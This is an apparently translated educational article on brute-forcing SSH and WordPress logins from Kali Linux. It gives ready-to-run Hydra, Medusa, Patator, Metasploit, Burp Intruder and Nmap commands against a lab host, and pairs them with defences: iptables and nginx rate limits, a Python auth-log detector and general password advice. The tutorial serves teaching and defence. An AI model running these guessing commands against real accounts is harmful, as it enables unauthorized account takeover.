Brute-force attacks using Kali Linux



Brute force (a brute-force attack) is a method of solving a problem by trying every candidate solution; its cost grows with the number of possible solutions. In the context of attacks, the term usually refers to an attacker trying to guess the login/password of an account or service.

Let's look at the tools available in Kali Linux for brute-force attacks on SSH and web services (Patator, Medusa, Hydra, Metasploit), as well as BurpSuite.

All materials in this article are intended solely for educational purposes. Using them for illegal purposes is prohibited.

Brute-force SSH


As an example, let's take a test machine at 192.168.60.50 and try to guess the password of the user test via SSH. We will use the popular passwords from the standard rockyou.txt dictionary.


Patator
To guess the password with Patator, run the command:

patator ssh_login host=192.168.60.50 user=test password=FILE0 0=/root/wordlist -x ignore:mesg='Authentication failed'

Where:
ssh_login - the required module
host - the target
user - the username whose password is being guessed, or a file with logins for guessing several accounts
password - the password dictionary
-x ignore:mesg='Authentication failed' - do not display lines containing this message. The filter is chosen individually for each target.




Hydra
To guess the password with Hydra, run the command:

hydra -V -f -t 4 -l test -P /root/wordlist ssh://192.168.60.50

Where:
-V - show each login + password pair as it is tried
-f - stop as soon as the password for the specified login is found
-t - the number of threads
-l - the login
-P - path to the dictionary with passwords
ssh://192.168.60.50 - the service and the IP address of the victim




Medusa
To guess the password with Medusa, run the following command:

medusa -h 192.168.60.50 -u test -P /root/wordlist -M ssh -f -v 6

Where:
-h - the victim's IP address
-u - the login
-P - path to the dictionary
-M - the module to use
-f - stop after finding a valid login/password pair
-v - verbosity of the messages shown on the screen during the attack




Metasploit
In msfconsole, search for a module for brute-forcing SSH:
search ssh_login
The search returns the following:


Enable the module:

use auxiliary/scanner/ssh/ssh_login

To view the required parameters, use the show options command. In our case they are:
rhosts - the victim's IP address
rport - the port
username - the SSH login
userpass_file - path to the dictionary
stop_on_success - stop as soon as a login/password pair is found
threads - the number of threads


The required parameters are specified with the set command:

set rhosts 192.168.60.50
set username test
set userpass_file /root/wordlist
set stop_on_success yes
set threads 4
set rport 22


Having set the necessary parameters, type run and wait.


Countermeasures


Limit the number of connections that can be established using a firewall. An example iptables rule:

-A INPUT -i eth0 -p tcp --dport 22 -m connlimit --connlimit-above 1 --connlimit-mask 32 -j REJECT --reject-with tcp-reset

Such a rule limits SSH access to 1 connection per second for each IP address, which significantly slows down guessing. Two-factor authentication (for example, with eToken) or key-based authentication, as well as IP-based ACLs, are also effective.
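Besides rate limiting, the attacks above leave a very recognisable trace in sshd's auth log: many "Failed password" events from one address in a short window, sometimes followed by an "Accepted password". The following sliding-window detector is an added example (not from the article, and not fail2ban's logic); the log lines it runs on are constructed, and the syslog hostname srv and the year are assumed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Matches sshd password events in syslog-style auth.log lines (timestamp has no year).
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+ ssh2")

# Constructed sample: a dictionary attack on user "test" from 192.168.60.1 that
# eventually succeeds, plus a single typo from another address.
SAMPLE_LOG = """\
Dec 10 12:00:01 srv sshd[1001]: Failed password for test from 192.168.60.1 port 40001 ssh2
Dec 10 12:00:02 srv sshd[1002]: Failed password for test from 192.168.60.1 port 40002 ssh2
Dec 10 12:00:02 srv sshd[1003]: Failed password for test from 192.168.60.1 port 40003 ssh2
Dec 10 12:00:03 srv sshd[1004]: Failed password for test from 192.168.60.1 port 40004 ssh2
Dec 10 12:00:04 srv sshd[1005]: Accepted password for test from 192.168.60.1 port 40005 ssh2
Dec 10 12:05:00 srv sshd[1006]: Failed password for admin from 10.0.0.7 port 50000 ssh2
Dec 10 12:05:30 srv sshd[1007]: Accepted password for admin from 10.0.0.7 port 50001 ssh2
""".splitlines()

def parse_line(line, year=2024):
    """Return (timestamp, result, user, ip), or None for lines we do not handle."""
    m = LINE_RE.match(line)
    if not m: return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]

def detect_bruteforce(lines, threshold=4, window_s=60):
    """Sliding-window detector: an address with >= threshold failures inside window_s seconds
    is flagged once; a later successful password login from a flagged address is the stronger
    signal (the dictionary probably contained the password).  Returns [(ip, alert, ts), ...]."""
    recent = defaultdict(deque)   # ip -> failure timestamps still inside the window
    flagged, alerts = set(), []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, result, _user, ip = parsed
        q = recent[ip]
        while q and (ts - q[0]).total_seconds() > window_s:
            q.popleft()               # expire failures older than the window
        if result == "Failed":
            q.append(ts)
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append((ip, "bruteforce", ts))
        elif ip in flagged:           # success after a flagged burst
            alerts.append((ip, "success_after_bruteforce", ts))
            q.clear()
    return alerts
```

A single failure followed by a success (the admin lines) produces no alert, which keeps ordinary typos out of the output.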

Brute-force WordPress


Consider another example: guessing the password for a web form login.


As an example, we will guess the password of the WordPress administrator account.



BurpSuite
First we need to understand how the authorization process works. For this we will use BurpSuite: we try to log in with an arbitrary login and password and look at which requests pass through BurpSuite.


Great, we see the POST request for authorization, and we will work with it.
Its body shows which login and password were submitted, which means we can substitute the values we need ourselves.
We send this request to Intruder and select the parameters for the attack there. In Payload Positions, leave the attack type as Sniper, but keep only the pwd parameter marked for substitution. Thus, only this parameter will change during the attack.


Load the necessary dictionary and start the attack.


From the behavior of the web application we see that a wrong password returns response code 200. After going through the dictionary we see that one of the passwords produced a response with code 302: that is the right one.


This brute-force method takes much longer than using Patator, Hydra, Medusa, etc. Even though we used a small dictionary, BurpSuite took about 40 minutes to go through it.



Hydra
Let's try to find the password using Hydra.
As we already know, an incorrect login returns code 200 and a successful one returns 302. Let's use this information.
Run the following command:

hydra -V -f -l admin -P /root/wordlist -t 4 http-post-form://192.168.60.50 -m "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.60.50%2Fwp-admin%2F&testcookie=1:S=302"

Here we specify the required parameters:
-l - the username
-P - the dictionary with passwords
-t - the number of threads
http-post-form - the form type; in our case it is POST
/wp-login.php - the URL of the login page
^USER^ - marks where to substitute the username
^PASS^ - marks where to substitute the password from the dictionary
S=302 - tells Hydra which response indicates success. In our case the response is 302 on successful authorization.




Patator
As we already know, an unsuccessful login returns code 200 and a successful one returns 302. We will use the same principle as with Hydra.
Run it with the command:

patator http_fuzz url=http://192.168.60.50/wp-login.php method=POST body='log=admin&pwd=FILE0&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.60.50%2Fwp-admin%2F&testcookie=1' 0=/root/wordlist -t 4 before_urls=http://192.168.60.50/wp-login.php -x ignore:code=200 accept_cookie=1

http_fuzz - module for brute-force HTTP attacks
url - the address of the login page
FILE0 - path to the dictionary with passwords
body - the data sent in the POST request during authorization
-t - the number of threads
-x - in this case we tell Patator not to display responses with code 200
accept_cookie - keep the cookie that is set and pass it to the next request
As a result, we managed to find the password.




Nmap
The Nmap utility can, among other things, guess passwords for web login forms if you use the http-wordpress-brute script with the appropriate arguments:
--script-args - pass arguments to the script
user or userdb - a login or a file with logins
pass or passdb - a password or a dictionary
http-wordpress-brute.threads - the number of threads
brute.firstonly=true - report the result after the first correct password

nmap 192.168.60.50 --script http-wordpress-brute --script-args 'user=admin,passdb=/root/wordlist,http-wordpress-brute.threads=3,brute.firstonly=true'


Countermeasures


Brute-force attacks against web applications can be limited (made harder) with iptables (as for SSH) and with nginx. In nginx, first define a limit zone:
...
limit_req_zone $binary_remote_addr zone=req_limits:10m rate=30r/s;
...

and then enable it for a location:
location / {
...
limit_req zone=req_limits burst=10;
limit_req_status 429;
...
}

Such settings will limit the number of requests from a single IP address to 40 per second.
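What rate=30r/s with burst=10 actually lets through is easiest to see on a model. The class below is an added example, not the article's code and not nginx's implementation; it reproduces the leaky-bucket arithmetic nginx uses for limit_req (assumed to match the real algorithm closely enough to reason with) and runs two constructed scenarios: one address POSTing to the login page steadily at 40 requests per second, and a 20-request instantaneous burst.

```python
class LimitReq:
    """Model of nginx's limit_req leaky bucket.  Like nginx it counts in thousandths:
    a request costs 1000 and the bucket drains rate*1000 per second.  Assumption: this
    mirrors the real algorithm; it is not nginx's code."""

    def __init__(self, rate_rps, burst, status=429):
        self.rate = rate_rps * 1000      # rate=30r/s -> 30000
        self.burst = burst * 1000        # burst=10   -> 10000
        self.status = status             # limit_req_status 429
        self.state = {}                  # client key ($binary_remote_addr) -> (last_ms, excess)

    def request(self, key, now_ms):
        """Status the client gets for a request at now_ms: 200 or self.status."""
        if key not in self.state:        # first request from this address: no excess yet
            self.state[key] = (now_ms, 0)
            return 200
        last_ms, excess = self.state[key]
        excess = excess - self.rate * (now_ms - last_ms) // 1000 + 1000
        if excess < 0:
            excess = 0
        if excess > self.burst:          # bucket overflows: reject, state left untouched
            return self.status
        self.state[key] = (now_ms, excess)   # accepted (nginx delays it while excess > 0)
        return 200

def simulate(limiter, key, times_ms):
    """Feed one client's requests at the given millisecond timestamps."""
    return [limiter.request(key, t) for t in times_ms]

def login_flood(rate=40, seconds=1.5):
    """Constructed scenario: one address POSTs to /wp-login.php evenly at `rate` r/s
    against the zone from the article (rate=30r/s, burst=10, limit_req_status 429)."""
    lim = LimitReq(rate_rps=30, burst=10)
    n = int(rate * seconds)
    return simulate(lim, "192.168.60.1", [i * 1000 // rate for i in range(n)])

def instant_burst(n=20):
    """Constructed scenario: n requests from a fresh address in the same millisecond."""
    return simulate(LimitReq(rate_rps=30, burst=10), "10.0.0.2", [0] * n)
```

In the steady 40 r/s flood the first 41 requests pass (the bucket fills by 250 per request), after which every fourth request gets 429, i.e. the client is held to 30 r/s; an instantaneous burst gets only burst+1 requests through before the rest are rejected.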

To make brute forcing harder, the following methods can be used:
- a firewall or other software that limits the number of requests to the protected service. How we use machine learning to detect such attacks (including distributed ones) is described in a separate article.
- tools that prevent rapid checking of whether a key is correct (for example, CAPTCHA).

Conclusion


In this article we have briefly looked at some popular tools. To reduce the risk of password guessing, follow these guidelines:
- use passwords that are resistant to guessing;
- do not build passwords from personal information, for example a date of birth, a name plus date of birth, or a mobile phone number;
- change your password regularly;
- use a unique password for every account.

Not everyone follows these recommendations (or the recommendations for secure web development), so you also need software solutions that allow you to:
- restrict connections by IP address or, if that is not possible, limit the number of simultaneous connections to the service (using iptables, nginx and others);
- use two-factor authentication;
- detect and block such attacks with a SIEM, a WAF or other means (for example, fail2ban).

Source: https://habr.com/ru/post/434216/